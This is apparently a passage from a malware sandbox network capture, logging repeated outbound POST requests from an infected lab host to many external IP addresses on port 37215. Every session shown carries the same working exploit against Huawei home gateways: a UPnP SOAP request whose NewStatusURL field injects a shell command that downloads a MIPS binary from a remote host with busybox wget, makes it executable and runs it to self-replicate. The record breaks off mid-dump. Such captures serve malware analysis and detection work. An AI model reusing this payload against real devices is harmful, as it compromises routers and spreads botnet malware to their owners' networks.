                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2166192.168.2.155747641.69.229.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.117299080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2167192.168.2.1555500182.52.26.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.118694067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2168192.168.2.1550940197.240.83.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.125911951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2169192.168.2.1553630197.78.158.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.125935078 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2170192.168.2.153523241.56.88.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.131117105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2171192.168.2.1550960197.227.75.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.136281967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2172192.168.2.15500224.147.53.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.190191984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2173192.168.2.1548328102.124.4.22737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.190216064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2174192.168.2.1534838182.210.213.15837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.190242052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2175192.168.2.1550648157.83.36.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.190275908 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 